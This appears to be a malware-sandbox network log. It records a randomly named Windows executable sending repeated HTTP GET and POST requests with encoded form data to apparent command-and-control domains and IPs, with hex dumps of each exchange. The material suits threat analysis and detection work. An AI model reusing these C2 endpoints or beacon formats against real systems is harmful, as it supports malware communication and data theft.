44 53 4f 41 56 37 52 51 66 79 67 6d 63 58 6a 67 76 38 42 6a 61 73 39 71 76 4c 5a 4e 36 6a 53 77 61 6a 38 6d 63 48 41 4a 32 58 74 67 49 73 42 68 2b 77 73 55 59 4b 35 [TRUNCATED] Data Ascii: QtKtUpvP=+cCAFC3M4Oqm5VcFnQxjWJGVzti3iIPzNSf+mVg6zzSax0iZ2KU1dJCkQ4YdlKGXEbhb8I/7DEfUqfKKeKticYfdLhV0N0wrQbJN52E9IXirVKxqCKjWZRr7cCkexOXFMZoBMtaWYx57f1m2jKxGiIv0YkDak2wlbOdSjsrBiKZILKe0NwRj0/6bnaPaBK+8Uf0CxfGGO+vog0kprqSt/qAn2A9xrKsgl5j+5iNgMCgU1pZBbeAszeZBnGspihtkI+a5IsiwgaE45KKXnSDSOAV7RQfygmcXjgv8Bjas9qvLZN6jSwaj8mcHAJ2XtgIsBh+wsUYK5okzTKi8C/PpfkPhhdY5lqsW4+vt8vn4X4g4BEZkWAJt+ourHrDne5yBJH/4cDAvMRSCzdZtrN5x5aldXcpMDde45DDpco2noAKZeAmCBsWsJzOgGTjy+0kdJtYSi1oazYR7/bmSo0YzTr/aPqPLO9nAA5GXVvG2GhrjebArqldY1vz6ubjmr8XdWp1k1AgxeDVSQ1oOTygbRfH0gBDsvnRosMhX8QCT7lfwg8M87ZCtkfZN7g2SNXXh8pLWpDJjIWCtl4xWtgfwVjtENvc2WVl00hQuWN6KaC1ekWHf8yNpCUS6sAmY25oEI+HaS9GTlHGVN27WH5W2MuyMJxYi2y8U6jvoTRBw5tfx/q4SQqH78lvTENE5+ptVFCbe9og+Kp4OAiNjTMtVDUxBB6z6SBTCNppEz5993g7u+TRgwT9IgCdgeyhMu55bBJybF5M3MWbl5SBRkv86LwrbEpuByrk980K4npB5HeFHG8WiGFgxgUZqwPSwsEcE4m6hCZpRUyCA7VrHbGy5LKPQ/R23DutGxEmP9dwts29LvPJAI605J3JdvOVlgTKSBNTFQpAi3Stj4+NF9n9eno7Kyt0Auf17B7JpZZKsFtiXLoHnKD5WOdQsb01stuCb9W79T24C3sJ5j+F1qmN6m1y5mp4mPpUBJ3avYhneY/+ [TRUNCATED]

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
20	192.168.2.5	49935	103.230.159.86	80	3948	C:\Program Files (x86)\MjcmUlwKPPukkTgHirMKJOzkqfgkFObYnkMVoZMnUL\ohrkzzHWPesnQB.exe

Timestamp	Bytes transferred	Direction	Data
Nov 29, 2024 03:54:24.235565901 CET	515	OUT	GET /bwyw/?QtKtUpvP=zeqgG3zf3rSD22A3/l1gTLGQ/sW8joOuTT/213oW5xKBpEmM0JRqJaaJcKUMxr+7Esc9obOTS2jlvNaYH8wfdJrEMWBKO10oQJYs1X8DEHawfodtM5bXZSXpbQgLy9TLag==&tz=vf30S8fHB HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US,en;q=0.9 Host: www.superiorfencing.net Connection: close User-Agent: Mozilla/5.0 (Windows NT 6.2; ARM; Trident/7.0; Touch; rv:11.0; WPDesktop; Lumia 521) like Gecko
Nov 29, 2024 03:54:25.829128981 CET	479	IN	HTTP/1.1 404 Not Found Date: Fri, 29 Nov 2024 02:54:25 GMT Server: Apache Content-Length: 315 Connection: close Content-Type: text/html; charset=iso-8859-1 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
21	192.168.2.5	49953	104.21.31.242	80	3948	C:\Program Files (x86)\MjcmUlwKPPukkTgHirMKJOzkqfgkFObYnkMVoZMnUL\ohrkzzHWPesnQB.exe

Timestamp	Bytes transferred	Direction	Data
Nov 29, 2024 03:54:31.415951967 CET	787	OUT	POST /2nga/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.9 Host: www.beylikduzu616161.xyz Origin: http://www.beylikduzu616161.xyz Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Content-Length: 209 Connection: close Referer: http://www.beylikduzu616161.xyz/2nga/ User-Agent: Mozilla/5.0 (Windows NT 6.2; ARM; Trident/7.0; Touch; rv:11.0; WPDesktop; Lumia 521) like Gecko Data Raw: 51 74 4b 74 55 70 76 50 3d 64 30 73 37 7a 51 51 51 72 62 36 53 66 43 6c 39 55 5a 77 6d 76 74 64 4f 58 55 69 4e 50 73 6c 6d 41 33 43 6f 67 64 67 67 30 55 51 78 56 6d 77 73 49 41 4a 65 39 34 32 6b 30 57 46 69 37 65 37 51 4e 48 76 67 33 34 7a 34 58 62 2b 75 6d 62 65 2f 4b 66 4b 41 43 65 30 44 4c 33 48 4f 78 6a 6d 41 55 4b 6d 38 58 6e 4c 50 4c 61 6d 53 32 6b 59 6f 77 55 33 6e 42 37 54 75 54 73 4a 61 5a 34 6e 43 50 73 51 5a 69 47 44 4c 2f 6f 76 53 6b 6c 6c 73 6a 38 36 4f 78 64 76 45 63 53 52 73 58 44 77 61 4a 33 32 38 4c 38 2b 69 56 6f 6e 58 57 4d 66 44 69 70 79 2f 33 43 63 61 77 30 31 55 59 44 50 70 34 48 59 52 6b 66 6f 3d Data Ascii: QtKtUpvP=d0s7zQQQrb6SfCl9UZwmvtdOXUiNPslmA3Cogdgg0UQxVmwsIAJe942k0WFi7e7QNHvg34z4Xb+umbe/KfKACe0DL3HOxjmAUKm8XnLPLamS2kYowU3nB7TuTsJaZ4nCPsQZiGDL/ovSkllsj86OxdvEcSRsXDwaJ328L8+iVonXWMfDipy/3Ccaw01UYDPp4HYRkfo=
Nov 29, 2024 03:54:32.686284065 CET	852	IN	HTTP/1.1 404 Not Found Date: Fri, 29 Nov 2024 02:54:32 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ZlJzUbGtpvJ4nRMnmY%2Fo8lIiy1iJE70JnIjljUqeOlt%2BaFmegZji4KCgh7E%2BtXIQrV%2BFyyVW1sGnnzBApCo8nZQLghZeQ7nWcMHyvIOMMSYF1AwHNEsUjoIzJHp8e3cUdoAKfybqHZHHhoU%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8e9f504c096c8c87-EWR Content-Encoding: gzip alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1775&min_rtt=1775&rtt_var=887&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=787&delivery_rate=0&cwnd=212&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 31 34 0d 0a 1f 8b 08 00 00 00 00 00 00 03 03 00 00 00 00 00 00 00 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 140

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
22	192.168.2.5	49961	104.21.31.242	80	3948	C:\Program Files (x86)\MjcmUlwKPPukkTgHirMKJOzkqfgkFObYnkMVoZMnUL\ohrkzzHWPesnQB.exe

Timestamp	Bytes transferred	Direction	Data
Nov 29, 2024 03:54:34.090936899 CET	807	OUT	POST /2nga/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.9 Host: www.beylikduzu616161.xyz Origin: http://www.beylikduzu616161.xyz Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Content-Length: 229 Connection: close Referer: http://www.beylikduzu616161.xyz/2nga/ User-Agent: Mozilla/5.0 (Windows NT 6.2; ARM; Trident/7.0; Touch; rv:11.0; WPDesktop; Lumia 521) like Gecko Data Raw: 51 74 4b 74 55 70 76 50 3d 64 30 73 37 7a 51 51 51 72 62 36 53 65 6d 68 39 53 34 77 6d 70 4e 64 42 4c 6b 69 4e 47 4d 6c 69 41 77 4b 6f 67 63 6b 77 33 67 38 78 56 48 41 73 4a 42 4a 65 2b 34 32 6b 73 6d 46 74 6d 4f 36 39 4e 48 69 66 33 36 33 34 58 61 65 75 6d 5a 32 2f 4b 73 69 48 4e 75 30 57 4e 33 48 41 2b 44 6d 41 55 4b 6d 38 58 6e 66 31 4c 65 4b 53 32 56 49 6f 77 77 6a 6b 50 62 54 76 53 73 4a 61 64 34 6e 47 50 73 51 76 69 48 65 51 2f 75 72 53 6b 6b 56 73 67 6f 4f 52 2f 64 75 42 53 79 52 2f 62 57 45 53 4a 56 71 32 43 64 58 43 4e 72 2f 52 58 36 75 70 34 4c 36 58 6b 69 77 69 67 6e 39 6a 4a 7a 75 41 69 6b 49 68 36 49 2f 68 4e 2f 46 44 34 63 48 71 6d 6f 63 52 59 7a 36 76 46 66 73 52 Data Ascii: QtKtUpvP=d0s7zQQQrb6Semh9S4wmpNdBLkiNGMliAwKogckw3g8xVHAsJBJe+42ksmFtmO69NHif3634XaeumZ2/KsiHNu0WN3HA+DmAUKm8Xnf1LeKS2VIowwjkPbTvSsJad4nGPsQviHeQ/urSkkVsgoOR/duBSyR/bWESJVq2CdXCNr/RX6up4L6Xkiwign9jJzuAikIh6I/hN/FD4cHqmocRYz6vFfsR
Nov 29, 2024 03:54:35.496841908 CET	853	IN	HTTP/1.1 404 Not Found Date: Fri, 29 Nov 2024 02:54:35 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=yTPcR%2FpQcvep%2BpVG3tbdgPcXDwCTE3vUbHKoB8OjpdTxdOnnI6J9yVoqPnI3LNl0N%2BRNF9ULRpN3CIOOeLnoKYDge5zd8BH1nB6Z74WWjXUldklPxMiV1pZlMY5hvpjEXf9IbXU%2F5paewUM%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8e9f505d3cd95e5f-EWR Content-Encoding: gzip alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=2305&min_rtt=2305&rtt_var=1152&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=807&delivery_rate=0&cwnd=249&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 31 34 0d 0a 1f 8b 08 00 00 00 00 00 00 03 03 00 00 00 00 00 00 00 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 140

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
23	192.168.2.5	49967	104.21.31.242	80	3948	C:\Program Files (x86)\MjcmUlwKPPukkTgHirMKJOzkqfgkFObYnkMVoZMnUL\ohrkzzHWPesnQB.exe

Timestamp	Bytes transferred	Direction	Data
Nov 29, 2024 03:54:36.761042118 CET	1824	OUT	POST /2nga/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.9 Host: www.beylikduzu616161.xyz Origin: http://www.beylikduzu616161.xyz Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Content-Length: 1245 Connection: close Referer: http://www.beylikduzu616161.xyz/2nga/ User-Agent: Mozilla/5.0 (Windows NT 6.2; ARM; Trident/7.0; Touch; rv:11.0; WPDesktop; Lumia 521) like Gecko Data Raw: 51 74 4b 74 55 70 76 50 3d 64 30 73 37 7a 51 51 51 72 62 36 53 65 6d 68 39 53 34 77 6d 70 4e 64 42 4c 6b 69 4e 47 4d 6c 69 41 77 4b 6f 67 63 6b 77 33 67 30 78 55 31 59 73 49 69 68 65 2f 34 32 6b 79 57 45 4b 6d 4f 36 46 4e 48 71 62 33 36 36 44 58 66 61 75 6d 36 4f 2f 64 4e 69 48 57 65 30 57 41 58 48 4e 78 6a 6e 4b 55 4b 32 34 58 6e 50 31 4c 65 4b 53 32 57 67 6f 33 6b 33 6b 66 72 54 75 54 73 4a 57 5a 34 6e 2b 50 73 34 2f 69 48 4c 6c 2f 65 4c 53 6e 45 46 73 69 62 6d 52 67 74 75 44 66 53 51 69 62 57 42 4d 4a 56 32 63 43 64 6a 6b 4e 72 48 52 61 73 62 77 6e 36 71 56 78 45 55 6d 71 56 64 59 49 45 47 37 76 6c 63 41 33 66 76 6d 46 37 46 71 78 73 37 6c 74 63 42 32 5a 6c 4f 61 49 71 68 4f 54 2b 54 35 56 62 43 46 36 52 68 6f 76 34 39 62 61 4c 49 47 54 45 45 51 6b 39 61 73 53 4c 31 56 73 49 2f 65 43 72 34 77 38 63 58 37 44 6d 35 55 6c 45 47 77 51 38 75 33 36 63 2b 6d 37 66 77 54 58 30 4f 6e 4a 70 71 52 64 53 50 49 52 4c 38 64 36 63 56 42 6e 7a 44 48 6a 47 6f 55 6f 35 32 37 58 2b 72 32 45 6e 63 47 2b 6b 64 42 70 [TRUNCATED] Data Ascii: QtKtUpvP=d0s7zQQQrb6Semh9S4wmpNdBLkiNGMliAwKogckw3g0xU1YsIihe/42kyWEKmO6FNHqb366DXfaum6O/dNiHWe0WAXHNxjnKUK24XnP1LeKS2Wgo3k3kfrTuTsJWZ4n+Ps4/iHLl/eLSnEFsibmRgtuDfSQibWBMJV2cCdjkNrHRasbwn6qVxEUmqVdYIEG7vlcA3fvmF7Fqxs7ltcB2ZlOaIqhOT+T5VbCF6Rhov49baLIGTEEQk9asSL1VsI/eCr4w8cX7Dm5UlEGwQ8u36c+m7fwTX0OnJpqRdSPIRL8d6cVBnzDHjGoUo527X+r2EncG+kdBpSN66Ss/Gp9WqUQRIAlUOJWk6tqeva5dV/Maln9hu8c9LxP1E7gOfzCD85rLYw+1MZJgLu3o+y/dlfpw6DqbZOLYF9vAzDXMat7yABeSh0m7QTfSkswCogdRXHwVwl/lE3ddCQeOfLvsbigwIlFI0bBI0zaRCfycTpswPN7eba2E4dCB1afNLhs6UxajNp3ZTLvH9J1+a8tupeuw/qFbxPIkoFlgFZV7ZAb1nq52r+MjCkspmbV3z/xwBe1zkGe46Lvh7jZ7Y7g/1b96TnP1X9LTyY4g01VmFGpWDCK6+2QfT191ey5CI4PsejlMc3u3jcg/ybmTe8Jp2jXR7ULVdaheyDP7RomuQxgWDo8BXlgfrk6kTAg4ZXxoY0oDlz60PlHUuplL2rZC6ro3Rz+/UmEhJHz7hnhTfUG/r1Am3+3WZv4kZt2TWXMwg1ICDHBBYVphPLsdvVGsbtnANCTu/3HPh+Gu8PuhQ2IYrSHiwjAVgyP9XN50BLSvc33ozImn/MmiU/+/L3ypBLkj7KYIN+FxUYZhiVCMvsncLqu4tBeqUkk/y3MOaneB+1hNP2aFPm830HIfPHapI0AXq7FZETDrkIRcV5BgKzK9wS8wwsRJYOlC2fpmNMuhyRjZMyuohsfnIQWNRXzrZrEkP/lyJ/JCci+ylT8A54+ [TRUNCATED]
Nov 29, 2024 03:54:38.048862934 CET	849	IN	HTTP/1.1 404 Not Found Date: Fri, 29 Nov 2024 02:54:37 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=vnXrTVLz%2BjpjH2ug5OK0gfj84yl88xeCSVXpb0eI3RCU8M4br5DllwOnmJhkN%2FG9Hi2xI8100SQUeFbc3Y5ULPdIDI0161PDN10DgGcUbUQGAQsiTPh2pjQjbVcAslX0EPZcFwIwLqfgEmw%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8e9f506d6b0a438b-EWR Content-Encoding: gzip alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1769&min_rtt=1769&rtt_var=884&sent=1&recv=4&lost=0&retrans=0&sent_bytes=0&recv_bytes=1824&delivery_rate=0&cwnd=167&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 31 34 0d 0a 1f 8b 08 00 00 00 00 00 00 03 03 00 00 00 00 00 00 00 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 140

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
24	192.168.2.5	49973	104.21.31.242	80	3948	C:\Program Files (x86)\MjcmUlwKPPukkTgHirMKJOzkqfgkFObYnkMVoZMnUL\ohrkzzHWPesnQB.exe

Timestamp	Bytes transferred	Direction	Data
Nov 29, 2024 03:54:39.422620058 CET	516	OUT	GET /2nga/?tz=vf30S8fHB&QtKtUpvP=Q2EbwnYhq4vEVEYycJMqtdR4BlKtLPQlBliPtc8X0AIyDwowOCFGn/661E09vvaaF3LvgpjgW8Wvr6GWd63UJrMUJCnw12qESZ+LX2nRCILA4nY1/3XgMLmpfKZAfJSNaA== HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US,en;q=0.9 Host: www.beylikduzu616161.xyz Connection: close User-Agent: Mozilla/5.0 (Windows NT 6.2; ARM; Trident/7.0; Touch; rv:11.0; WPDesktop; Lumia 521) like Gecko
Nov 29, 2024 03:54:40.737956047 CET	802	IN	HTTP/1.1 404 Not Found Date: Fri, 29 Nov 2024 02:54:40 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=qxybTklE2o0lQgGMIE1phCKMH2%2FJXY3iJC5HzyWVEihOWIwsN%2FGOt022HRs6dQtbwja1irFdhGuPgzzCt4eXeObh8ZmN4K2L%2FCRqdYplsd8b288xymquik0gj2Xuut9GYlK%2FpDpK0rtbPpE%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8e9f507e5d9032fc-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1879&min_rtt=1879&rtt_var=939&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=516&delivery_rate=0&cwnd=222&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
25	192.168.2.5	49988	118.107.250.103	80	3948	C:\Program Files (x86)\MjcmUlwKPPukkTgHirMKJOzkqfgkFObYnkMVoZMnUL\ohrkzzHWPesnQB.exe

Timestamp	Bytes transferred	Direction	Data
Nov 29, 2024 03:54:46.415627956 CET	754	OUT	POST /gxyh/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.9 Host: www.zxyck.net Origin: http://www.zxyck.net Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Content-Length: 209 Connection: close Referer: http://www.zxyck.net/gxyh/ User-Agent: Mozilla/5.0 (Windows NT 6.2; ARM; Trident/7.0; Touch; rv:11.0; WPDesktop; Lumia 521) like Gecko Data Raw: 51 74 4b 74 55 70 76 50 3d 38 67 48 6f 74 56 30 30 6d 75 78 56 64 2f 45 77 78 34 44 52 6f 79 68 6a 4c 45 76 36 34 43 64 6b 6d 7a 4e 65 4d 53 71 38 33 54 70 6a 78 31 59 6c 69 4e 71 47 63 58 68 55 76 2f 34 4f 64 4e 4d 4a 65 64 68 64 53 79 6b 2b 4b 31 52 55 6f 37 59 6e 4c 62 4c 7a 79 67 4d 42 59 71 45 35 44 73 42 6e 67 37 6f 6f 78 35 38 71 78 6c 43 73 62 55 79 69 37 41 32 68 56 74 74 69 6c 48 4d 4d 4b 34 4a 43 75 5a 2f 5a 6a 58 38 6e 6a 57 38 77 38 31 37 69 49 64 77 32 64 6d 47 54 30 6b 72 34 74 5a 35 4e 36 6c 4d 45 31 49 39 75 61 4a 33 2b 69 4c 70 4d 54 63 6a 47 4f 44 77 48 65 73 63 58 49 6d 48 4a 4d 73 50 67 70 30 73 3d Data Ascii: QtKtUpvP=8gHotV00muxVd/Ewx4DRoyhjLEv64CdkmzNeMSq83Tpjx1YliNqGcXhUv/4OdNMJedhdSyk+K1RUo7YnLbLzygMBYqE5DsBng7oox58qxlCsbUyi7A2hVttilHMMK4JCuZ/ZjX8njW8w817iIdw2dmGT0kr4tZ5N6lME1I9uaJ3+iLpMTcjGODwHescXImHJMsPgp0s=
Nov 29, 2024 03:54:48.008616924 CET	308	IN	HTTP/1.1 200 OK Server: Tengine Date: Fri, 29 Nov 2024 02:53:45 GMT Content-Type: text/html;charset=utf-8 Transfer-Encoding: chunked Connection: close Vary: Accept-Encoding Strict-Transport-Security: max-age=31536000 Content-Encoding: gzip Data Raw: 32 65 0d 0a 1f 8b 08 00 00 00 00 00 00 03 d3 2f 2f 2f d7 07 e2 a2 fc fc 12 fd aa 8a ca e4 6c bd bc d4 12 fd f4 8a ca 0c 3d 00 b4 92 fd 2c 1c 00 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 2e///l=,0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
26	192.168.2.5	49994	118.107.250.103	80	3948	C:\Program Files (x86)\MjcmUlwKPPukkTgHirMKJOzkqfgkFObYnkMVoZMnUL\ohrkzzHWPesnQB.exe

Timestamp	Bytes transferred	Direction	Data
Nov 29, 2024 03:54:49.083453894 CET	774	OUT	POST /gxyh/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.9 Host: www.zxyck.net Origin: http://www.zxyck.net Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Content-Length: 229 Connection: close Referer: http://www.zxyck.net/gxyh/ User-Agent: Mozilla/5.0 (Windows NT 6.2; ARM; Trident/7.0; Touch; rv:11.0; WPDesktop; Lumia 521) like Gecko Data Raw: 51 74 4b 74 55 70 76 50 3d 38 67 48 6f 74 56 30 30 6d 75 78 56 66 66 30 77 32 5a 44 52 75 53 68 69 56 30 76 36 71 43 64 67 6d 7a 42 65 4d 54 2f 68 33 68 39 6a 77 51 6b 6c 77 38 71 47 66 58 68 55 6b 66 35 4b 54 74 4d 53 65 64 6b 69 53 78 38 2b 4b 31 46 55 6f 35 51 6e 4c 4b 4c 79 67 41 4d 48 51 4b 45 2f 48 73 42 6e 67 37 6f 6f 78 35 6f 41 78 6c 61 73 61 6b 43 69 30 43 65 2b 57 74 74 68 78 58 4d 4d 4f 34 49 71 75 5a 2f 33 6a 54 39 76 6a 51 34 77 38 77 66 69 49 73 77 78 45 32 47 5a 37 45 72 71 68 35 30 55 39 44 34 74 39 4f 4d 50 4c 61 7a 52 6a 39 59 6d 4a 2b 72 75 64 6a 63 2f 4f 2f 55 67 5a 57 6d 67 57 50 66 51 33 6a 37 73 42 4c 78 61 2f 65 4a 4d 6c 6a 70 4f 79 43 71 34 73 52 37 6f Data Ascii: QtKtUpvP=8gHotV00muxVff0w2ZDRuShiV0v6qCdgmzBeMT/h3h9jwQklw8qGfXhUkf5KTtMSedkiSx8+K1FUo5QnLKLygAMHQKE/HsBng7oox5oAxlasakCi0Ce+WtthxXMMO4IquZ/3jT9vjQ4w8wfiIswxE2GZ7Erqh50U9D4t9OMPLazRj9YmJ+rudjc/O/UgZWmgWPfQ3j7sBLxa/eJMljpOyCq4sR7o
Nov 29, 2024 03:54:50.571125031 CET	308	IN	HTTP/1.1 200 OK Server: Tengine Date: Fri, 29 Nov 2024 02:53:47 GMT Content-Type: text/html;charset=utf-8 Transfer-Encoding: chunked Connection: close Vary: Accept-Encoding Strict-Transport-Security: max-age=31536000 Content-Encoding: gzip Data Raw: 32 65 0d 0a 1f 8b 08 00 00 00 00 00 00 03 d3 2f 2f 2f d7 07 e2 a2 fc fc 12 fd aa 8a ca e4 6c bd bc d4 12 fd f4 8a ca 0c 3d 00 b4 92 fd 2c 1c 00 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 2e///l=,0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
27	192.168.2.5	50002	118.107.250.103	80	3948	C:\Program Files (x86)\MjcmUlwKPPukkTgHirMKJOzkqfgkFObYnkMVoZMnUL\ohrkzzHWPesnQB.exe

Timestamp	Bytes transferred	Direction	Data
Nov 29, 2024 03:54:51.741697073 CET	1791	OUT	POST /gxyh/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.9 Host: www.zxyck.net Origin: http://www.zxyck.net Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Content-Length: 1245 Connection: close Referer: http://www.zxyck.net/gxyh/ User-Agent: Mozilla/5.0 (Windows NT 6.2; ARM; Trident/7.0; Touch; rv:11.0; WPDesktop; Lumia 521) like Gecko Data Raw: 51 74 4b 74 55 70 76 50 3d 38 67 48 6f 74 56 30 30 6d 75 78 56 66 66 30 77 32 5a 44 52 75 53 68 69 56 30 76 36 71 43 64 67 6d 7a 42 65 4d 54 2f 68 33 68 6c 6a 77 6d 77 6c 68 72 47 47 65 58 68 55 6e 66 35 4a 54 74 4e 49 65 5a 49 6d 53 32 31 44 4b 33 39 55 70 62 6f 6e 65 4f 58 79 35 77 4d 48 63 71 45 36 44 73 42 79 67 37 34 6b 78 35 34 41 78 6c 61 73 61 6d 61 69 77 51 32 2b 61 4e 74 69 6c 48 4d 32 4b 34 4a 48 75 5a 47 4b 6a 54 77 4e 69 67 59 77 38 51 50 69 4b 2b 59 78 62 6d 47 66 38 45 71 35 68 35 34 78 39 44 4d 50 39 4b 45 70 4c 61 37 52 75 70 64 73 4e 39 54 6c 41 30 73 41 4e 2f 46 46 41 32 54 41 59 65 65 6b 38 6a 6a 77 46 4a 74 4a 30 71 30 4a 68 67 34 46 6d 6e 75 58 6a 56 53 69 73 52 74 32 62 41 59 61 44 36 64 39 4b 4a 42 6b 39 51 46 48 30 59 7a 34 67 54 4c 63 33 35 53 53 74 4c 46 32 34 6b 58 4f 63 4a 4a 41 32 58 44 64 46 63 59 34 34 65 38 6e 69 4e 47 2b 57 72 31 61 47 76 77 31 35 5a 61 2f 46 4b 73 47 68 44 77 4a 53 52 49 76 34 55 33 4f 62 36 4d 7a 74 6f 5a 78 65 4c 53 6c 39 72 6c 4e 36 31 52 44 66 [TRUNCATED] Data Ascii: 